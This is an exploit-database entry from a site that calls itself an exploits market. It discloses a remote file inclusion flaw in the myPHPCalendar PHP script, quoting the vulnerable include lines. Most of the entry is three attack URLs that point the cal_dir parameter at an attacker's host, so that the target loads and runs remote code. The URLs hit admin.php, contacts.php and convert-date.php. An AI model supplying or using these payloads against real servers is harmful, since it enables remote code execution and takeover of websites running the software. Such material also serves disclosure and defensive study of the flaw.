[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

myPHPCalendar 10192000b (cal_dir) Remote File Include Vulnerabilities

Author
Cr@zy_King
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-1326
Category
web applications
Date add
26-12-2006
Platform
unsorted
=====================================================================
myPHPCalendar 10192000b (cal_dir) Remote File Include Vulnerabilities
=====================================================================



# script name : myPHPCalendar

# Script Downloads : http://freshmeat.net/projects/myphpcalendar/

# Web Site : http://myphpcalendar.sourceforge.net/

# Version : 10.1

# Risk : High

# Found By : Cr@zy_King

# Thanks : | eTNR | ApAci | Eno7 | TheHacker | Kormali46 | The_Bekir |
Metallicali | Liz0zim | ERNE | Swat_Hack | Commander | Soceita

# Code :
include($cal_dir."vars.inc");
include($cal_dir."prefs.inc");


#Vuln : http://[target]/admin.php?cal_dir=http://[attacker]/
http://[target]/contacts.php?cal_dir=http://[attacker]/
http://[target]/convert-date.php?cal_dir=http://[attacker]/



#  0day.today [2024-12-25]  #